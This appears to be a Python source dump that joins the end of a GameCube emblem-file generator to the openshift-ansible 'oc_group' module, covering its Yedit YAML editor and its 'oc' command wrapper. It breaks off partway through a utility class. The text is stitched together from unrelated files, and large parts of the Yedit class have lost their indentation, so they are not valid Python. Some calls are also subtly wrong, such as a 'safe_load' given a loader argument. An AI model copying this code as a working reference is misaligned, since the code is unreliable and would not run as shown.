    header_bytes = setup_header_bytes(emblem_short_filename, seconds_since_start_of_2000)
    more_info_bytes = setup_more_info_bytes(now, args.additional_comment)
    img = image(args.image_filename)
    # TODO: Test non-RGBA stuff going through crop or resize64.
    # (That, or know when to tell the user to resize/convert themselves...)
    img64 = edge_options(img, args.edge_option)
    # TODO: Check how the 64 to 32 resize is done by the game. Not a
    # big deal though, it just means the banner may look slightly different
    # than it should in a memcard manager.
    img32 = img.resize((32,32), Image.LANCZOS)
    img64_data = img64.getdata()
    emblem_pixel_bytes = emblem(img64_data, alpha_threshold)
    banner_bytes = banner(img32, alpha_threshold)
    # A bunch of zeros until the end of 3 Gamecube memory blocks
    end_padding_bytes = bytearray(0x6040 - 0x40A0)
    # Everything after the 2-byte checksum participates in the checksum.
    post_checksum_bytes = more_info_bytes + banner_bytes \
        + icon_bytes + emblem_pixel_bytes + end_padding_bytes
    checksum_bytes = checksum(post_checksum_bytes)
    emblem_file = open(emblem_full_filename, 'wb')
    emblem_file.write(header_bytes + checksum_bytes + post_checksum_bytes)
    emblem_file.close()
|
|
#!/usr/bin/env python
# pylint: disable=missing-docstring
# flake8: noqa: T001
# ___ ___ _ _ ___ ___ _ _____ ___ ___
# / __| __| \| | __| _ \ /_\_ _| __| \
# | (_ | _|| .` | _|| / / _ \| | | _|| |) |
# \___|___|_|\_|___|_|_\/_/_\_\_|_|___|___/_ _____
# | \ / _ \ | \| |/ _ \_ _| | __| \_ _|_ _|
# | |) | (_) | | .` | (_) || | | _|| |) | | | |
# |___/ \___/ |_|\_|\___/ |_| |___|___/___| |_|
#
# Copyright 2016 Red Hat, Inc. and/or its affiliates
# and other contributors as indicated by the @author tags.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- -*- -*- Begin included fragment: lib/import.py -*- -*- -*-
'''
OpenShiftCLI class that wraps the oc commands in a subprocess
'''
# pylint: disable=too-many-lines
from __future__ import print_function
import atexit
import copy
import json
import os
import re
import shutil
import subprocess
import tempfile
# pylint: disable=import-error
try:
import ruamel.yaml as yaml
except ImportError:
import yaml
from ansible.module_utils.basic import AnsibleModule
# -*- -*- -*- End included fragment: lib/import.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: doc/group -*- -*- -*-
DOCUMENTATION = '''
---
module: oc_group
short_description: Modify, and idempotently manage openshift groups.
description:
- Modify openshift groups programmatically.
options:
state:
description:
- Supported states, present, absent, list
- present - will ensure object is created or updated to the value specified
- list - will return a group
- absent - will remove the group
required: False
default: present
choices: ["present", 'absent', 'list']
aliases: []
kubeconfig:
description:
- The path for the kubeconfig file to use for authentication
required: false
default: /etc/origin/master/admin.kubeconfig
aliases: []
debug:
description:
- Turn on debug output.
required: false
default: False
aliases: []
name:
description:
- Name of the object that is being queried.
required: false
default: None
aliases: []
namespace:
description:
- The namespace where the object lives.
required: false
default: str
aliases: []
author:
- "Joel Diaz <jdiaz@redhat.com>"
extends_documentation_fragment: []
'''
EXAMPLES = '''
- name: create group
oc_group:
state: present
name: acme_org
register: group_out
'''
# -*- -*- -*- End included fragment: doc/group -*- -*- -*-
# -*- -*- -*- Begin included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
class YeditException(Exception):  # pragma: no cover
    ''' Exception raised for all Yedit load/traverse/write failures. '''
    pass
# pylint: disable=too-many-public-methods
class Yedit(object): # pragma: no cover
''' Class to modify yaml files '''
# Regex templates; the %s / {} slots are filled with the separator
# characters NOT currently in use (see valid_key / parse_key).
re_valid_key = r"(((\[-?\d+\])|([0-9a-zA-Z%s/_-]+)).?)+$"
re_key = r"(?:\[(-?\d+)\])|([0-9a-zA-Z{}/_-]+)"
com_sep = set(['.', '#', '|', ':'])  # all supported key separators
# pylint: disable=too-many-arguments
def __init__(self,
             filename=None,
             content=None,
             content_type='yaml',
             separator='.',
             backup=False):
    ''' Load `filename` and/or `content` into an editable dict.

    :param content_type: 'yaml' or 'json'
    :param separator: path separator used by get/put/delete keys
    :param backup: when True, write() copies the file to .orig first
    '''
    self.content = content
    self._separator = separator
    self.filename = filename
    self.__yaml_dict = content
    self.content_type = content_type
    self.backup = backup
    self.load(content_type=self.content_type)
    # fall back to an empty document when nothing could be loaded
    if self.__yaml_dict is None:
        self.__yaml_dict = {}
@property
def separator(self):
    ''' getter method for separator '''
    return self._separator

@separator.setter
def separator(self, inc_sep):
    ''' setter method for separator '''
    self._separator = inc_sep
@property
def yaml_dict(self):
    ''' getter method for yaml_dict (the parsed document) '''
    return self.__yaml_dict

@yaml_dict.setter
def yaml_dict(self, value):
    ''' setter method for yaml_dict '''
    self.__yaml_dict = value
@staticmethod
def parse_key(key, sep='.'):
'''parse the key allowing the appropriate separator'''
common_separators = list(Yedit.com_sep - set([sep]))
return re.findall(Yedit.re_key.format(''.join(common_separators)), key)
@staticmethod
def valid_key(key, sep='.'):
'''validate the incoming key'''
common_separators = list(Yedit.com_sep - set([sep]))
if not re.match(Yedit.re_valid_key.format(''.join(common_separators)), key):
return False
return True
@staticmethod
def remove_entry(data, key, sep='.'):
    ''' Remove the value at location `key` inside `data`.

    An empty key clears the whole container. Returns True on removal,
    None when the key is invalid or the path cannot be followed.
    '''
    if key == '' and isinstance(data, dict):
        data.clear()
        return True
    elif key == '' and isinstance(data, list):
        del data[:]
        return True

    if not (key and Yedit.valid_key(key, sep)) and \
       isinstance(data, (list, dict)):
        return None

    # walk every component except the last to reach the parent container
    key_indexes = Yedit.parse_key(key, sep)
    for arr_ind, dict_key in key_indexes[:-1]:
        if dict_key and isinstance(data, dict):
            data = data.get(dict_key)
        elif (arr_ind and isinstance(data, list) and
              int(arr_ind) <= len(data) - 1):
            data = data[int(arr_ind)]
        else:
            return None

    # process last index for remove
    # expected list entry
    if key_indexes[-1][0]:
        if isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1:  # noqa: E501
            del data[int(key_indexes[-1][0])]
            return True

    # expected dict entry
    elif key_indexes[-1][1]:
        if isinstance(data, dict):
            del data[key_indexes[-1][1]]
            return True
@staticmethod
def add_entry(data, key, item=None, sep='.'):
    ''' Set `item` at the location described by `key` (e.g. "a#b" with
    sep='#'), creating intermediate dicts along the way.

    Returns the value that was written (or the updated root for an
    empty key); None when the key is invalid.
    :raises YeditException: when an intermediate path element is not
        traversable (non-dict value, list index out of range).
    '''
    if key == '':
        pass
    elif (not (key and Yedit.valid_key(key, sep)) and
          isinstance(data, (list, dict))):
        return None

    key_indexes = Yedit.parse_key(key, sep)
    for arr_ind, dict_key in key_indexes[:-1]:
        if dict_key:
            if isinstance(data, dict) and dict_key in data and data[dict_key]:  # noqa: E501
                data = data[dict_key]
                continue

            elif data and not isinstance(data, dict):
                raise YeditException("Unexpected item type found while going through key " +
                                     "path: {} (at key: {})".format(key, dict_key))

            # create the missing intermediate dict
            data[dict_key] = {}
            data = data[dict_key]

        elif (arr_ind and isinstance(data, list) and
              int(arr_ind) <= len(data) - 1):
            data = data[int(arr_ind)]
        else:
            raise YeditException("Unexpected item type found while going through key path: {}".format(key))

    if key == '':
        data = item

    # process last index for add
    # expected list entry
    elif key_indexes[-1][0] and isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1:  # noqa: E501
        data[int(key_indexes[-1][0])] = item

    # expected dict entry
    elif key_indexes[-1][1] and isinstance(data, dict):
        data[key_indexes[-1][1]] = item

    # didn't add/update to an existing list, nor add/update key to a dict
    # so we must have been provided some syntax like a.b.c[<int>] = "data" for a
    # non-existent array
    else:
        raise YeditException("Error adding to object at path: {}".format(key))

    return data
@staticmethod
def get_entry(data, key, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
d = {'a': {'b': 'c'}}}
key = a.b
return c
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes:
if dict_key and isinstance(data, dict):
data = data.get(dict_key)
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
return None
return data
@staticmethod
def _write(filename, contents):
''' Actually write the file contents to disk. This helps with mocking. '''
tmp_filename = filename + '.yedit'
with open(tmp_filename, 'w') as yfd:
yfd.write(contents)
os.rename(tmp_filename, filename)
def write(self):
    ''' Serialize yaml_dict to self.filename.

    Returns (True, yaml_dict). Honors self.backup by copying the
    existing file to "<filename>.orig" first.
    :raises YeditException: when no filename is set.
    '''
    if not self.filename:
        raise YeditException('Please specify a filename.')

    if self.backup and self.file_exists():
        shutil.copy(self.filename, self.filename + '.orig')

    # Try to set format attributes if supported
    try:
        self.yaml_dict.fa.set_block_style()
    except AttributeError:
        pass

    # Try to use RoundTripDumper if supported (ruamel.yaml); plain
    # PyYAML falls back to safe_dump.
    try:
        Yedit._write(self.filename, yaml.dump(self.yaml_dict, Dumper=yaml.RoundTripDumper))
    except AttributeError:
        Yedit._write(self.filename, yaml.safe_dump(self.yaml_dict, default_flow_style=False))

    return (True, self.yaml_dict)
def read(self):
''' read from file '''
# check if it exists
if self.filename is None or not self.file_exists():
return None
contents = None
with open(self.filename) as yfd:
contents = yfd.read()
return contents
def file_exists(self):
''' return whether file exists '''
if os.path.exists(self.filename):
return True
return False
def load(self, content_type='yaml'):
    ''' Parse the file (or self.content) into yaml_dict and return it.

    A dict passed as self.content is used verbatim; a string is parsed
    as yaml or json per `content_type`.
    :raises YeditException: when parsing fails.
    '''
    contents = self.read()

    if not contents and not self.content:
        return None

    if self.content:
        if isinstance(self.content, dict):
            # already-parsed content short-circuits parsing entirely
            self.yaml_dict = self.content
            return self.yaml_dict
        elif isinstance(self.content, str):
            contents = self.content

    # check if it is yaml
    try:
        if content_type == 'yaml' and contents:
            # Try to set format attributes if supported
            try:
                self.yaml_dict.fa.set_block_style()
            except AttributeError:
                pass

            # Try to use RoundTripLoader if supported (ruamel.yaml).
            try:
                self.yaml_dict = yaml.safe_load(contents, yaml.RoundTripLoader)
            except AttributeError:
                self.yaml_dict = yaml.safe_load(contents)

            # Try to set format attributes if supported
            try:
                self.yaml_dict.fa.set_block_style()
            except AttributeError:
                pass

        elif content_type == 'json' and contents:
            self.yaml_dict = json.loads(contents)
    except yaml.YAMLError as err:
        # Error loading yaml or json
        raise YeditException('Problem with loading yaml file. {}'.format(err))

    return self.yaml_dict
def get(self, key):
''' get a specified key'''
try:
entry = Yedit.get_entry(self.yaml_dict, key, self.separator)
except KeyError:
entry = None
return entry
def pop(self, path, key_or_item):
    ''' Remove `key_or_item` from the dict or list found at `path`.

    Returns (changed, yaml_dict); changed is False when the path is
    missing, the item is absent, or the entry is neither dict nor list.
    '''
    try:
        entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
    except KeyError:
        entry = None

    if entry is None:
        return (False, self.yaml_dict)

    if isinstance(entry, dict):
        # AUDIT:maybe-no-member makes sense due to fuzzy types
        # pylint: disable=maybe-no-member
        if key_or_item in entry:
            entry.pop(key_or_item)
            return (True, self.yaml_dict)
        return (False, self.yaml_dict)

    elif isinstance(entry, list):
        # AUDIT:maybe-no-member makes sense due to fuzzy types
        # pylint: disable=maybe-no-member
        ind = None
        try:
            ind = entry.index(key_or_item)
        except ValueError:
            return (False, self.yaml_dict)

        entry.pop(ind)
        return (True, self.yaml_dict)

    return (False, self.yaml_dict)
def delete(self, path):
''' remove path from a dict'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
return (False, self.yaml_dict)
result = Yedit.remove_entry(self.yaml_dict, path, self.separator)
if not result:
return (False, self.yaml_dict)
return (True, self.yaml_dict)
def exists(self, path, value):
    ''' Check whether `value` exists at `path`.

    For a list entry: membership test. For a dict entry: when `value`
    is a dict, every key/value pair must match; otherwise `value` is
    tested as a key. Any other entry is compared for equality.
    NOTE(review): the dict-vs-dict comparison raises KeyError when a
    compared key is missing from the entry -- confirm callers guard.
    '''
    try:
        entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
    except KeyError:
        entry = None

    if isinstance(entry, list):
        if value in entry:
            return True
        return False

    elif isinstance(entry, dict):
        if isinstance(value, dict):
            rval = False
            for key, val in value.items():
                if entry[key] != val:
                    rval = False
                    break
            else:
                rval = True
            return rval

        return value in entry

    return entry == value
def append(self, path, value):
    ''' Append `value` to the list at `path`, creating it when missing.

    Returns (changed, yaml_dict); False when the entry exists but is
    not a list.
    '''
    try:
        entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
    except KeyError:
        entry = None

    if entry is None:
        # create an empty list at the path, then re-fetch it
        self.put(path, [])
        entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
    if not isinstance(entry, list):
        return (False, self.yaml_dict)

    # AUDIT:maybe-no-member makes sense due to loading data from
    # a serialized format.
    # pylint: disable=maybe-no-member
    entry.append(value)
    return (True, self.yaml_dict)
# pylint: disable=too-many-arguments
def update(self, path, value, index=None, curr_value=None):
    ''' Update the entry at `path`.

    Dict entries are merged with `value` (which must be a dict). List
    entries are updated in place at `index`, or at the position of
    `curr_value`, or `value` is appended when not already present.
    Returns (changed, yaml_dict).
    :raises YeditException: when merging a non-dict into a dict entry.
    '''
    try:
        entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
    except KeyError:
        entry = None

    if isinstance(entry, dict):
        # AUDIT:maybe-no-member makes sense due to fuzzy types
        # pylint: disable=maybe-no-member
        if not isinstance(value, dict):
            raise YeditException('Cannot replace key, value entry in dict with non-dict type. ' +
                                 'value=[{}] type=[{}]'.format(value, type(value)))

        entry.update(value)
        return (True, self.yaml_dict)

    elif isinstance(entry, list):
        # AUDIT:maybe-no-member makes sense due to fuzzy types
        # pylint: disable=maybe-no-member
        ind = None
        if curr_value:
            try:
                ind = entry.index(curr_value)
            except ValueError:
                return (False, self.yaml_dict)

        elif index is not None:
            ind = index

        if ind is not None and entry[ind] != value:
            entry[ind] = value
            return (True, self.yaml_dict)

        # see if it exists in the list
        try:
            ind = entry.index(value)
        except ValueError:
            # doesn't exist, append it
            entry.append(value)
            return (True, self.yaml_dict)

        # already exists, return
        if ind is not None:
            return (False, self.yaml_dict)
    return (False, self.yaml_dict)
def put(self, path, value):
    ''' put path, value into a dict

    Mutates a working copy first so a failed add_entry leaves
    self.yaml_dict untouched.  Returns a (changed, yaml_dict) tuple.
    '''
    try:
        entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
    except KeyError:
        entry = None

    if entry == value:
        # Already the desired value: report no change.
        return (False, self.yaml_dict)

    # deepcopy didn't work
    # Try to use ruamel.yaml and fallback to pyyaml
    try:
        # Round-trip through ruamel to preserve comments/format metadata
        tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
                                                  default_flow_style=False),
                             yaml.RoundTripLoader)
    except AttributeError:
        tmp_copy = copy.deepcopy(self.yaml_dict)

    # set the format attributes if available
    try:
        tmp_copy.fa.set_block_style()
    except AttributeError:
        pass

    result = Yedit.add_entry(tmp_copy, path, value, self.separator)
    if result is None:
        return (False, self.yaml_dict)

    # When path equals "" it is a special case.
    # "" refers to the root of the document
    # Only update the root path (entire document) when its a list or dict
    if path == '':
        if isinstance(result, list) or isinstance(result, dict):
            self.yaml_dict = result
            return (True, self.yaml_dict)

        return (False, self.yaml_dict)

    self.yaml_dict = tmp_copy

    return (True, self.yaml_dict)
def create(self, path, value):
    ''' create a yaml file

    Only acts when the backing file does not already exist.
    Returns a (changed, yaml_dict) tuple.
    '''
    if not self.file_exists():
        # deepcopy didn't work
        # Try to use ruamel.yaml and fallback to pyyaml
        try:
            # Round-trip through ruamel to preserve format metadata
            tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
                                                      default_flow_style=False),
                                 yaml.RoundTripLoader)
        except AttributeError:
            tmp_copy = copy.deepcopy(self.yaml_dict)

        # set the format attributes if available
        try:
            tmp_copy.fa.set_block_style()
        except AttributeError:
            pass

        result = Yedit.add_entry(tmp_copy, path, value, self.separator)
        if result is not None:
            self.yaml_dict = tmp_copy
            return (True, self.yaml_dict)

    return (False, self.yaml_dict)
@staticmethod
def get_curr_value(invalue, val_type):
    '''return the current value

    invalue: serialized string (or None)
    val_type: 'yaml' or 'json' selects the parser; any other value
    returns the input unchanged.
    '''
    if invalue is None:
        return None

    curr_value = invalue
    if val_type == 'yaml':
        curr_value = yaml.load(invalue)
    elif val_type == 'json':
        curr_value = json.loads(invalue)

    return curr_value
@staticmethod
def parse_value(inc_value, vtype=''):
    '''determine value type passed

    Validates boolean-ish strings when vtype mentions 'bool',
    stringifies bools when vtype mentions 'str', and otherwise
    yaml-loads plain strings to coerce them to a native type.
    '''
    true_bools = ['y', 'Y', 'yes', 'Yes', 'YES', 'true', 'True', 'TRUE',
                  'on', 'On', 'ON', ]
    false_bools = ['n', 'N', 'no', 'No', 'NO', 'false', 'False', 'FALSE',
                   'off', 'Off', 'OFF']

    # It came in as a string but you didn't specify value_type as string
    # we will convert to bool if it matches any of the above cases
    if isinstance(inc_value, str) and 'bool' in vtype:
        if inc_value not in true_bools and inc_value not in false_bools:
            raise YeditException('Not a boolean type. str=[{}] vtype=[{}]'.format(inc_value, vtype))
    elif isinstance(inc_value, bool) and 'str' in vtype:
        inc_value = str(inc_value)

    # There is a special case where '' will turn into None after yaml loading it so skip
    if isinstance(inc_value, str) and inc_value == '':
        pass
    # If vtype is not str then go ahead and attempt to yaml load it.
    elif isinstance(inc_value, str) and 'str' not in vtype:
        try:
            inc_value = yaml.safe_load(inc_value)
        except Exception:
            raise YeditException('Could not determine type of incoming value. ' +
                                 'value=[{}] vtype=[{}]'.format(type(inc_value), vtype))

    return inc_value
@staticmethod
def process_edits(edits, yamlfile):
    '''run through a list of edits and process them one-by-one

    edits: list of dicts with at least 'key' and 'value'; optional
    'action' ('update'/'append', default put), 'value_type',
    'curr_value', 'curr_value_format', and 'index'.
    yamlfile: the Yedit instance to apply the edits to.
    Returns {'changed': bool, 'results': [...]}.
    '''
    results = []
    for edit in edits:
        value = Yedit.parse_value(edit['value'], edit.get('value_type', ''))
        if edit.get('action') == 'update':
            # pylint: disable=line-too-long
            curr_value = Yedit.get_curr_value(
                Yedit.parse_value(edit.get('curr_value')),
                edit.get('curr_value_format'))

            rval = yamlfile.update(edit['key'],
                                   value,
                                   edit.get('index'),
                                   curr_value)

        elif edit.get('action') == 'append':
            rval = yamlfile.append(edit['key'], value)

        else:
            rval = yamlfile.put(edit['key'], value)

        # rval is (changed, yaml_dict); record only actual changes
        if rval[0]:
            results.append({'key': edit['key'], 'edit': rval[1]})

    return {'changed': len(results) > 0, 'results': results}
# pylint: disable=too-many-return-statements,too-many-branches
@staticmethod
def run_ansible(params):
    '''perform the idempotent crud operations

    params: the ansible module parameter dict.  Dispatches on
    params['state'] ('list', 'absent', 'present') and returns an
    ansible-style result dict ('changed'/'result'/'state' or
    'failed'/'msg').
    '''
    yamlfile = Yedit(filename=params['src'],
                     backup=params['backup'],
                     separator=params['separator'])

    state = params['state']

    if params['src']:
        rval = yamlfile.load()

        if yamlfile.yaml_dict is None and state != 'present':
            return {'failed': True,
                    'msg': 'Error opening file [{}].  Verify that the '.format(params['src']) +
                           'file exists, that it is has correct permissions, and is valid yaml.'}

    if state == 'list':
        if params['content']:
            content = Yedit.parse_value(params['content'], params['content_type'])
            yamlfile.yaml_dict = content

        if params['key']:
            rval = yamlfile.get(params['key']) or {}

        return {'changed': False, 'result': rval, 'state': state}

    elif state == 'absent':
        if params['content']:
            content = Yedit.parse_value(params['content'], params['content_type'])
            yamlfile.yaml_dict = content

        # 'update' removes a single value from a list; otherwise the
        # whole key is deleted
        if params['update']:
            rval = yamlfile.pop(params['key'], params['value'])
        else:
            rval = yamlfile.delete(params['key'])

        if rval[0] and params['src']:
            yamlfile.write()

        return {'changed': rval[0], 'result': rval[1], 'state': state}

    elif state == 'present':
        # check if content is different than what is in the file
        if params['content']:
            content = Yedit.parse_value(params['content'], params['content_type'])

            # We had no edits to make and the contents are the same
            if yamlfile.yaml_dict == content and \
               params['value'] is None:
                return {'changed': False, 'result': yamlfile.yaml_dict, 'state': state}

            yamlfile.yaml_dict = content

        # If we were passed a key, value then
        # we enapsulate it in a list and process it
        # Key, Value passed to the module : Converted to Edits list #
        edits = []
        _edit = {}
        if params['value'] is not None:
            _edit['value'] = params['value']
            _edit['value_type'] = params['value_type']
            _edit['key'] = params['key']

            if params['update']:
                _edit['action'] = 'update'
                _edit['curr_value'] = params['curr_value']
                _edit['curr_value_format'] = params['curr_value_format']
                _edit['index'] = params['index']

            elif params['append']:
                _edit['action'] = 'append'

            edits.append(_edit)

        elif params['edits'] is not None:
            edits = params['edits']

        if edits:
            results = Yedit.process_edits(edits, yamlfile)

            # if there were changes and a src provided to us we need to write
            if results['changed'] and params['src']:
                yamlfile.write()

            return {'changed': results['changed'], 'result': results['results'], 'state': state}

        # no edits to make
        if params['src']:
            # pylint: disable=redefined-variable-type
            rval = yamlfile.write()
            return {'changed': rval[0],
                    'result': rval[1],
                    'state': state}

        # We were passed content but no src, key or value, or edits.  Return contents in memory
        return {'changed': False, 'result': yamlfile.yaml_dict, 'state': state}
    return {'failed': True, 'msg': 'Unkown state passed'}
# -*- -*- -*- End included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/base.py -*- -*- -*-
# pylint: disable=too-many-lines
# noqa: E301,E302,E303,T001
class OpenShiftCLIError(Exception):
    '''Exception raised for errors originating in the OpenShift CLI wrapper.'''
# Extra directories searched beyond $PATH; oc is sometimes installed in
# /usr/local/bin, which ansible/sudo may strip from the environment.
ADDITIONAL_PATH_LOOKUPS = ['/usr/local/bin', os.path.expanduser('~/bin')]


def locate_oc_binary():
    ''' Find and return oc binary file '''
    # https://github.com/openshift/openshift-ansible/issues/3410
    # oc can be in /usr/local/bin in some cases, but that may not
    # be in $PATH due to ansible/sudo
    search_paths = os.environ.get("PATH", os.defpath).split(os.pathsep) + ADDITIONAL_PATH_LOOKUPS
    binary = 'oc'

    # Use shutil.which if it is available, otherwise fallback to a naive path search
    try:
        located = shutil.which(binary, path=os.pathsep.join(search_paths))
    except AttributeError:
        # Python without shutil.which: probe each directory by hand.
        for directory in search_paths:
            candidate = os.path.join(directory, binary)
            if os.path.exists(candidate):
                return candidate
        return binary

    return located if located is not None else binary
# pylint: disable=too-few-public-methods
class OpenShiftCLI(object):
    ''' Class to wrap the command line tools '''
    def __init__(self,
                 namespace,
                 kubeconfig='/etc/origin/master/admin.kubeconfig',
                 verbose=False,
                 all_namespaces=False):
        ''' Constructor for OpenshiftCLI '''
        self.namespace = namespace
        self.verbose = verbose
        # Operate on a private copy of the kubeconfig so this module
        # cannot clobber the shared credentials file.
        self.kubeconfig = Utils.create_tmpfile_copy(kubeconfig)
        self.all_namespaces = all_namespaces
        self.oc_binary = locate_oc_binary()

    # Pylint allows only 5 arguments to be passed.
    # pylint: disable=too-many-arguments
    def _replace_content(self, resource, rname, content, force=False, sep='.'):
        ''' replace the current object with the content '''
        res = self._get(resource, rname)
        if not res['results']:
            return res

        fname = Utils.create_tmpfile(rname + '-')
        yed = Yedit(fname, res['results'][0], separator=sep)
        changes = []
        for key, value in content.items():
            changes.append(yed.put(key, value))

        # Only invoke `oc replace` when at least one put reported a change.
        if any([change[0] for change in changes]):
            yed.write()

            atexit.register(Utils.cleanup, [fname])

            return self._replace(fname, force)

        return {'returncode': 0, 'updated': False}

    def _replace(self, fname, force=False):
        '''replace the current object with oc replace'''
        # We are removing the 'resourceVersion' to handle
        # a race condition when modifying oc objects
        yed = Yedit(fname)
        results = yed.delete('metadata.resourceVersion')
        if results[0]:
            yed.write()
        cmd = ['replace', '-f', fname]
        if force:
            cmd.append('--force')
        return self.openshift_cmd(cmd)

    def _create_from_content(self, rname, content):
        '''create a temporary file and then call oc create on it'''
        fname = Utils.create_tmpfile(rname + '-')
        yed = Yedit(fname, content=content)
        yed.write()

        atexit.register(Utils.cleanup, [fname])

        return self._create(fname)

    def _create(self, fname):
        '''call oc create on a filename'''
        return self.openshift_cmd(['create', '-f', fname])

    def _delete(self, resource, name=None, selector=None):
        '''call oc delete on a resource

        Exactly one of name or selector must be supplied.
        '''
        cmd = ['delete', resource]
        if selector is not None:
            cmd.append('--selector={}'.format(selector))
        elif name is not None:
            cmd.append(name)
        else:
            raise OpenShiftCLIError('Either name or selector is required when calling delete.')

        return self.openshift_cmd(cmd)

    def _process(self, template_name, create=False, params=None, template_data=None):  # noqa: E501
        '''process a template

           template_name: the name of the template to process
           create: whether to send to oc create after processing
           params: the parameters for the template
           template_data: the incoming template's data; instead of a file
        '''
        cmd = ['process']
        if template_data:
            # read the template from stdin instead of a named file
            cmd.extend(['-f', '-'])
        else:
            cmd.append(template_name)
        if params:
            param_str = ["{}={}".format(key, str(value).replace("'", r'"')) for key, value in params.items()]
            cmd.append('-v')
            cmd.extend(param_str)

        results = self.openshift_cmd(cmd, output=True, input_data=template_data)

        if results['returncode'] != 0 or not create:
            return results

        fname = Utils.create_tmpfile(template_name + '-')
        yed = Yedit(fname, results['results'])
        yed.write()

        atexit.register(Utils.cleanup, [fname])

        return self.openshift_cmd(['create', '-f', fname])

    def _get(self, resource, name=None, selector=None):
        '''return a resource by name '''
        cmd = ['get', resource]
        if selector is not None:
            cmd.append('--selector={}'.format(selector))
        elif name is not None:
            cmd.append(name)

        cmd.extend(['-o', 'json'])

        rval = self.openshift_cmd(cmd, output=True)

        # Ensure results are retuned in an array
        if 'items' in rval:
            rval['results'] = rval['items']
        elif not isinstance(rval['results'], list):
            rval['results'] = [rval['results']]

        return rval

    def _schedulable(self, node=None, selector=None, schedulable=True):
        ''' perform oadm manage-node scheduable '''
        cmd = ['manage-node']
        if node:
            cmd.extend(node)
        else:
            cmd.append('--selector={}'.format(selector))

        cmd.append('--schedulable={}'.format(schedulable))

        return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')  # noqa: E501

    def _list_pods(self, node=None, selector=None, pod_selector=None):
        ''' perform oadm list pods

            node: the node in which to list pods
            selector: the label selector filter if provided
            pod_selector: the pod selector filter if provided
        '''
        cmd = ['manage-node']
        if node:
            cmd.extend(node)
        else:
            cmd.append('--selector={}'.format(selector))

        if pod_selector:
            cmd.append('--pod-selector={}'.format(pod_selector))

        cmd.extend(['--list-pods', '-o', 'json'])

        return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')

    # pylint: disable=too-many-arguments
    def _evacuate(self, node=None, selector=None, pod_selector=None, dry_run=False, grace_period=None, force=False):
        ''' perform oadm manage-node evacuate '''
        cmd = ['manage-node']
        if node:
            cmd.extend(node)
        else:
            cmd.append('--selector={}'.format(selector))

        if dry_run:
            cmd.append('--dry-run')

        if pod_selector:
            cmd.append('--pod-selector={}'.format(pod_selector))

        if grace_period:
            cmd.append('--grace-period={}'.format(int(grace_period)))

        if force:
            cmd.append('--force')

        cmd.append('--evacuate')

        return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')

    def _version(self):
        ''' return the openshift version'''
        return self.openshift_cmd(['version'], output=True, output_type='raw')

    def _import_image(self, url=None, name=None, tag=None):
        ''' perform image import '''
        cmd = ['import-image']

        image = '{0}'.format(name)
        if tag:
            image += ':{0}'.format(tag)

        cmd.append(image)

        if url:
            cmd.append('--from={0}/{1}'.format(url, image))

        cmd.append('-n{0}'.format(self.namespace))

        cmd.append('--confirm')
        return self.openshift_cmd(cmd)

    def _run(self, cmds, input_data):
        ''' Actually executes the command. This makes mocking easier. '''
        curr_env = os.environ.copy()
        curr_env.update({'KUBECONFIG': self.kubeconfig})
        proc = subprocess.Popen(cmds,
                                stdin=subprocess.PIPE,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE,
                                env=curr_env)

        stdout, stderr = proc.communicate(input_data)

        return proc.returncode, stdout.decode('utf-8'), stderr.decode('utf-8')

    # pylint: disable=too-many-arguments,too-many-branches
    def openshift_cmd(self, cmd, oadm=False, output=False, output_type='json', input_data=None):
        '''Base command for oc

        Builds the full argv (binary, optional 'adm', namespace flags),
        runs it, and returns a dict with 'returncode', 'cmd', 'results'
        and, on error, 'stdout'/'stderr'.
        '''
        cmds = [self.oc_binary]

        if oadm:
            cmds.append('adm')

        cmds.extend(cmd)

        if self.all_namespaces:
            cmds.extend(['--all-namespaces'])
        elif self.namespace is not None and self.namespace.lower() not in ['none', 'emtpy']:  # E501
            cmds.extend(['-n', self.namespace])

        if self.verbose:
            print(' '.join(cmds))

        try:
            returncode, stdout, stderr = self._run(cmds, input_data)
        except OSError as ex:
            returncode, stdout, stderr = 1, '', 'Failed to execute {}: {}'.format(subprocess.list2cmdline(cmds), ex)

        rval = {"returncode": returncode,
                "cmd": ' '.join(cmds)}

        if output_type == 'json':
            rval['results'] = {}
            if output and stdout:
                try:
                    rval['results'] = json.loads(stdout)
                except ValueError as verr:
                    if "No JSON object could be decoded" in verr.args:
                        rval['err'] = verr.args
        elif output_type == 'raw':
            rval['results'] = stdout if output else ''

        if self.verbose:
            print("STDOUT: {0}".format(stdout))
            print("STDERR: {0}".format(stderr))

        if 'err' in rval or returncode != 0:
            rval.update({"stderr": stderr,
                         "stdout": stdout})

        return rval
class Utils(object):  # pragma: no cover
    ''' utilities for openshiftcli modules '''

    @staticmethod
    def _write(filename, contents):
        ''' Actually write the file contents to disk. This helps with mocking. '''

        with open(filename, 'w') as sfd:
            sfd.write(contents)

    @staticmethod
